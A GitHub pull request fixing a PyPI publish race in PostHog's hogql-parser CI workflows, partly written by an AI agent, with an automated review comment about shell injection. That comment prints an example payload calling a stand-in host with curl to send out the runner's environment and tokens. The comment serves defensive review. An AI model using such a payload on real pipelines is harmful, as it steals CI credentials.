fix(ci): make hogql-parser publish robust to PyPI CDN cache lag#60643

Merged
robbie-c merged 3 commits into master from claude/nervous-khayyam-6c9cc4 on May 29, 2026

@robbie-c
Member

Problem

The Publish package to PyPI step in .github/workflows/build-hogql-parser-rs.yml (and identically build-hogql-parser.yml) can fail with a hard HTTP 400 on the first wheel even when that version is already on PyPI. The most recent occurrence: hogql-parser-rs 1.3.81 in PR #60226 — see run 26630162284 / job 78477339876.

The failure mode is a race against PyPI's JSON-API CDN cache, plus the workflow's own auto-pin retrigger:

  1. check-version runs curl https://pypi.org/pypi/<pkg>/json | jq -r .info.version. That endpoint is served by Fastly with Cache-Control: max-age=600, so for up to ten minutes after a successful upload the cached JSON can still report the previous version.
  2. After a successful publish, the workflow's Commit pin step pushes a tests-posthog[bot] commit (Use new hogql-parser-rs version) back to the PR branch. That push retriggers the same workflow, because GitHub's pull_request path filter evaluates the PR diff (not the latest commit's diff) and the PR overall still touches rust/hogql/parser/**.
  3. The retriggered run's check-version hits the stale JSON cache (timeline for 1.3.81 in PR #60226: wheel uploaded 09:41:54Z, retrigger check-version 09:43:45Z, ~100s into the cache window), sees published != local, sets parser-release-needed=true, and build-wheels rebuilds. The publish step's twine call then gets a real HTTP 400 Bad Request from https://upload.pypi.org/legacy/ because the file already exists, and skip-existing: false (the default) turns that into a hard step failure.
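
The race in the steps above can be reproduced without touching PyPI. The following is a minimal sketch that models the old check as a plain string comparison. `release_needed_by_latest` is a hypothetical helper name, and the stale value `1.3.80` is an assumption for illustration (the description only says the cache can still report the previous version).

```bash
#!/usr/bin/env bash
# Model of the old check: compare the version reported by the package-level
# JSON endpoint (.info.version) with the local version.
# release_needed_by_latest is a hypothetical helper, not a name from the workflow.
release_needed_by_latest() {
    local published="$1" local_version="$2"
    if [[ "$published" != "$local_version" ]]; then
        echo 'true'
    else
        echo 'false'
    fi
}

# Fresh cache: the endpoint already reports the version that was just uploaded.
release_needed_by_latest '1.3.81' '1.3.81'   # prints: false

# Stale cache (assumed value 1.3.80): the check wrongly asks for a republish.
release_needed_by_latest '1.3.80' '1.3.81'   # prints: true
```

The second call is the situation the retriggered run was in: the comparison itself is correct, but its input is up to ten minutes old.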

Quoted from the failing attempt-1 log:

2026-05-29T09:47:47.3126136Z Uploading distributions to https://upload.pypi.org/legacy/
2026-05-29T09:47:47.3794665Z Uploading hogql_parser_rs-1.3.81-cp312-abi3-macosx_10_12_x86_64.whl
2026-05-29T09:47:47.6802330Z WARNING  Error during upload. Retry with the --verbose option for more details.
2026-05-29T09:47:47.6808776Z ERROR    HTTPError: 400 Bad Request from https://upload.pypi.org/legacy/
2026-05-29T09:47:47.6809845Z          Bad Request

The wheel itself was uploaded by the prior, successful run 26629862904 at 09:41:54-09:42:04Z; the failing run is what auto-pin pushed and the cache race let through.

Changes

Applied identically to build-hogql-parser-rs.yml (Rust crate via maturin) and build-hogql-parser.yml (C++ wrapper via cibuildwheel), since they share the failure mode.

  1. Per-version PyPI check. Replace .info.version comparison with a per-version page lookup:

    http_code=$(curl -o /dev/null -sSL -w '%{http_code}' "https://pypi.org/pypi/<pkg>/$local/json")
    if [[ "$http_code" == '404' ]]; then
        parser_release_needed='true'
    elif [[ "$http_code" == '200' ]]; then
        : # no-op placeholder so the branch is valid bash; version-not-bumped comment path (unchanged)
    else
        echo "::warning::Unexpected HTTP $http_code from PyPI for <pkg> $local; assuming not yet published."
        parser_release_needed='true'
    fi

    Per-version pages have their own cache key and are invalidated on upload, so 404 vs 200 is authoritative within seconds of a successful publish (no CDN race). The unknown-status branch falls back to needs-release plus a ::warning::, so a transient PyPI 5xx doesn't silently skip an actual bump.

  2. skip-existing: true on the publish step. Belt-and-braces with the check above. If anything else ever drives the publish step toward a duplicate upload (a retried attempt, a parallel run that lost a race), twine will print "Skipping ... already exists" and the step exits 0 instead of failing the whole pipeline.
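
The status handling from change 1 can be sketched as a small pure function, which makes the three branches easy to exercise without a network call. `decide_release_needed` is a hypothetical helper name, and returning `false` for HTTP 200 is an assumption about what the unchanged version-not-bumped path leaves in `parser_release_needed`.

```bash
#!/usr/bin/env bash
# Map the HTTP status of https://pypi.org/pypi/<pkg>/<version>/json to the
# parser_release_needed decision described in change 1.
# decide_release_needed is a hypothetical helper name.
decide_release_needed() {
    local http_code="$1"
    case "$http_code" in
        404) echo 'true' ;;    # version page missing: not yet published
        200) echo 'false' ;;   # version page exists: already published (assumed value)
        *)
            # Unknown status (for example a transient 5xx): warn and fall back
            # to needs-release so a real bump is not silently skipped.
            # This sketch sends the warning to stderr so stdout carries only
            # the decision; the workflow snippet uses a plain echo.
            echo "::warning::Unexpected HTTP $http_code from PyPI; assuming not yet published." >&2
            echo 'true'
            ;;
    esac
}
```

In the workflow the status would come from the `curl -w '%{http_code}'` call shown in change 1, for example `decide_release_needed "$http_code"`.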

build-hogql-parser-npm.yml is intentionally not changed: it publishes to the npm registry (no PyPI JSON cache involved) and uses a separate PostHog/check-package-version action with its own version-detection mechanism. If a similar race exists there it's worth a follow-up audit, but it's not the same bug as this one.

How did you test this code?

I'm an agent and only did automated verification:

  • python3 -c "import yaml; yaml.safe_load(open(path))" on both modified files.
  • bash -n on every run: shell block in both workflows.
  • Verified the per-version PyPI endpoint contract against live pypi.org:
    • pypi.org/pypi/hogql-parser-rs/1.3.81/json → HTTP 200 (existing version)
    • pypi.org/pypi/hogql-parser-rs/99.99.99/json → HTTP 404 (missing version)
    • pypi.org/pypi/no-such-pkg-i-promise-zzz/0.0.1/json → HTTP 404 (so the "first ever publish" path correctly resolves to needs-release; this is the case that the deleted "PyPI returns 404 until the first publish" comment was guarding against)
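
For reference, the `bash -n` check listed above only parses a script and never runs it. A minimal sketch of wrapping it for a single extracted `run:` block follows; `shell_syntax_ok` is a hypothetical helper name, and how the block is extracted from the workflow YAML is left out.

```bash
#!/usr/bin/env bash
# Syntax-check a shell snippet read from stdin without executing it.
# shell_syntax_ok is a hypothetical helper name.
shell_syntax_ok() {
    local tmp status
    tmp="$(mktemp)"
    cat > "$tmp"                 # copy the snippet from stdin to a temp file
    bash -n "$tmp" 2>/dev/null   # -n: read commands but do not execute them
    status=$?
    rm -f "$tmp"
    return "$status"
}
```

A snippet such as `printf 'if true; then\n    echo ok\nfi\n' | shell_syntax_ok` returns 0, while a branch containing only a comment is rejected as a syntax error.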

The end-to-end behavior of the publish workflow against PyPI was not tested.

Automatic notifications

  • Publish to changelog?
  • Alert Sales and Marketing teams?

🤖 Agent context

Authored by Claude (Opus 4.7) in Claude Code, after investigation of the 1.3.81 publish failure.

Initial hypothesis was a sigstore/Rekor transient flake (the prior five bumps in the same PR succeeded, and action issues #364/#376/#377 describe similar shapes). Pulling the actual attempt-1 log via the REST API disproved that. gh run view --job returns the most recent attempt's log, not a specific attempt's, so the linked job ID needed runs/<id>/attempts/1/logs to get the right zip. Cross-referencing the log timestamps against the per-file upload_time_iso_8601 from pypi.org/pypi/hogql-parser-rs/1.3.81/json showed the wheel was uploaded by the prior, successful run 26629862904 at 09:41:54-09:42:04 UTC. The failing run only started its publish at 09:47:23 UTC, on the auto-pin commit pushed by the prior run, so the failure is a duplicate upload of an already-published version, not a sigstore flake.
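
A minimal sketch of building the attempt-specific logs path mentioned above. `attempt_logs_path` is a hypothetical helper name, and `OWNER`/`REPO` are placeholders because the description does not spell out the repository slug.

```bash
#!/usr/bin/env bash
# Build the GitHub REST API path for the logs of one specific attempt of a
# workflow run. attempt_logs_path is a hypothetical helper name.
attempt_logs_path() {
    local owner="$1" repo="$2" run_id="$3" attempt="$4"
    printf 'repos/%s/%s/actions/runs/%s/attempts/%s/logs\n' \
        "$owner" "$repo" "$run_id" "$attempt"
}

# Example, not executed here: fetch the log archive for attempt 1 of the
# failing run. OWNER and REPO are placeholders.
#   gh api "$(attempt_logs_path OWNER REPO 26630162284 1)" > attempt-1-logs.zip
```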

Considered and rejected:

  • Pinning forward to pypa/gh-action-pypi-publish v1.14.0. Its changelog has no relevant fix (only verbose / print-hash default flips and dep bumps), and action issue #405 reports v1.14.0 regresses some callers.
  • attestations: false. Attestations were not the failure mode (Fulcio cert + 7 Rekor transparency-log entries all succeeded before the upload).
  • Marking it transient and re-running. The retrigger is structural (commit-pin push fires the workflow on every bump), so any bump can hit the same race.
  • Suppressing the retrigger entirely by appending [skip ci] to the auto-pin commit message. Orthogonal to the PyPI cache race the fix targets, and after the check-version fix the retrigger does nothing useful anyway (check-version correctly resolves to false on the auto-pin commit). Worth a separate PR if we want to save the wasted runner cycle.

robbie-c and others added 2 commits May 29, 2026 11:31
check-version reads `.info.version` from `pypi.org/pypi/<pkg>/json`,
which Fastly caches with max-age=600. For up to ten minutes after an
upload the cached JSON can still report the prior version. When the
publish step's auto-pin commit retriggers the same workflow, the new
run hits that stale cache, decides a republish is needed, and twine
hard-fails with HTTP 400 on the duplicate upload because skip-existing
is off. Latest hit: hogql-parser-rs 1.3.81 in PR #60226 (run
26630162284, job 78477339876).

Switch the check to the per-version page
(`pypi.org/pypi/<pkg>/<local>/json`), which is invalidated on upload
and so 404/200 is authoritative; 404 means needs-release, 200 means
already published, anything else logs a warning and falls back to
needs-release. Belt-and-braces, also set skip-existing: true on the
publish step so any future duplicate-upload code path is a no-op
success instead of a hard failure.

Applied identically to build-hogql-parser-rs.yml (Rust crate via
maturin) and build-hogql-parser.yml (C++ wrapper via cibuildwheel),
since they share the failure mode. build-hogql-parser-npm.yml is
unchanged: it publishes to npm via npm publish and uses a separate
PostHog/check-package-version action with its own version-detection
mechanism, so the same PyPI-JSON-API race does not apply.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

Drop the multi-line rationales that referenced the fix and the prior
implementation; the remaining one-liner reads as standalone code.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@robbie-c robbie-c marked this pull request as ready for review May 29, 2026 10:50
@assign-reviewers-posthog assign-reviewers-posthog Bot requested a review from a team May 29, 2026 10:50
@greptile-apps
Contributor

greptile-apps Bot commented May 29, 2026

Reviews (1): Last reviewed commit: "chore(ci): trim hogql-parser workflow co..."

if [[ -n "$existing" ]]; then
gh api "repos/${{ github.repository }}/issues/comments/$existing" -X PATCH -f body="$message_body"
# 200 = version already on PyPI, 404 = needs release.
http_code=$(curl -o /dev/null -sSL -w '%{http_code}' "https://pypi.org/pypi/hogql-parser-rs/$local/json")

🟡 Shell injection via PR-controlled version string in curl URL

In build-hogql-parser-rs.yml, $local is extracted from rust/hogql/parser/pyproject.toml (a PR-controlled file) via grep | sed and then embedded directly inside a double-quoted shell string on line 54:

http_code=$(curl -o /dev/null -sSL -w '%{http_code}' "https://pypi.org/pypi/hogql-parser-rs/$local/json")

If the version in pyproject.toml contains a ", the shell quoting breaks and the rest of the value executes as shell commands. For example, version = "1.0.0"$(curl -sf https://evil.example/x -d @/proc/self/environ)" makes $local = 1.0.0"$(...) and the shell expands the inner command substitution. The check-version job has no fork restriction (unlike build-wheels/publish), so any external contributor opening a fork PR against rust/hogql/parser/** can trigger this. The job has GH_TOKEN (GITHUB_TOKEN with pull-requests: write) set as an env var, which the injected command can exfiltrate. This is a regression: the old code used $local only in safe shell contexts (comparisons, string concatenation) — the URL construction is a new injection sink introduced by this PR. build-hogql-parser.yml line 51 has the identical pattern (though $local there already comes from python setup.py --version, itself PR-controlled code).

Prompt To Fix With AI
In both `.github/workflows/build-hogql-parser-rs.yml` and `.github/workflows/build-hogql-parser.yml`, add a version-format guard immediately after `$local` is assigned and before it is used in the curl URL. Valid PyPI/semver versions only contain alphanumeric characters, dots, hyphens, underscores, and `+`. Reject anything else:

```bash
# In build-hogql-parser-rs.yml, after line 50:
local=$(grep -m1 '^version = ' rust/hogql/parser/pyproject.toml | sed -E 's/version = "(.*)"/\1/')
if [[ ! "$local" =~ ^[0-9A-Za-z._+-]+$ ]]; then  # hyphen last in the bracket expression, so it is literal
    echo "::error::Invalid version string in pyproject.toml: '$local'"
    exit 1
fi
```

Apply the same guard in `build-hogql-parser.yml` after `local=$(cd common/hogql_parser && python setup.py --version)`.

Alternatively, switch from double-quote interpolation to passing the URL as a separate argument that cannot be interpreted as shell metacharacters, but input validation is the more robust fix here since it also protects downstream uses of `$local`.

Severity: medium | Confidence: 80%
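
The suggested guard can be sketched as a standalone function so that it can be exercised outside the workflow. `is_valid_version` is a hypothetical helper name, and the accepted character set simply mirrors the one proposed in the comment above; it is not a full PEP 440 validator.

```bash
#!/usr/bin/env bash
# Accept only version strings made of alphanumerics, dots, underscores,
# plus signs, and hyphens. is_valid_version is a hypothetical helper name.
is_valid_version() {
    local version="$1"
    # The hyphen is placed last in the bracket expression so it is literal.
    [[ "$version" =~ ^[0-9A-Za-z._+-]+$ ]]
}

# Example use before building the PyPI URL:
#   is_valid_version "$local" || { echo "::error::Invalid version: '$local'"; exit 1; }
```

With this shape, `1.3.81` passes, while an empty string or a value containing quotes, slashes, or `$(` is rejected before it reaches the curl URL.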

Add a workflow: pattern to the changed-files step alongside parser:,
and flip parser-release-needed=true when the YAML is the only thing
that changed. skip-existing on the publish step keeps the duplicate
upload a no-op, so a workflow edit exercises build + publish end-to-
end and catches a broken edit at PR time instead of at the next real
release.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
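
A rough sketch of the decision this commit message describes, under stated assumptions: `release_needed_for_changes` and its three arguments are hypothetical names, and the real workflow derives these values from its changed-files step and the per-version PyPI check rather than from function arguments.

```bash
#!/usr/bin/env bash
# Decide parser-release-needed from which paths changed.
# release_needed_for_changes and its arguments are hypothetical.
#   $1: 'true' if parser sources changed
#   $2: 'true' if the workflow YAML changed
#   $3: 'true' if the local version is already on PyPI
release_needed_for_changes() {
    local parser_changed="$1" workflow_changed="$2" version_on_pypi="$3"
    if [[ "$workflow_changed" == 'true' && "$parser_changed" != 'true' ]]; then
        # Workflow-only edit: run build + publish anyway; skip-existing
        # keeps the duplicate upload a no-op.
        echo 'true'
    elif [[ "$version_on_pypi" == 'true' ]]; then
        echo 'false'
    else
        echo 'true'
    fi
}
```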
@robbie-c robbie-c temporarily deployed to pypi-hogql-parser-rs May 29, 2026 11:01 — with GitHub Actions Inactive
@robbie-c robbie-c had a problem deploying to pypi-hogql-parser May 29, 2026 11:07 — with GitHub Actions Failure
@robbie-c robbie-c merged commit 4d35e50 into master May 29, 2026
162 of 163 checks passed
@robbie-c robbie-c deleted the claude/nervous-khayyam-6c9cc4 branch May 29, 2026 11:27
@deployment-status-posthog

deployment-status-posthog Bot commented May 29, 2026

Deploy status

| Environment | Status | Deployed At | Workflow |
|---|---|---|---|
| dev | ✅ Deployed | 2026-05-29 11:56 UTC | Run |
| prod-us | ✅ Deployed | 2026-05-29 12:17 UTC | Run |
| prod-eu | ✅ Deployed | 2026-05-29 12:24 UTC | Run |
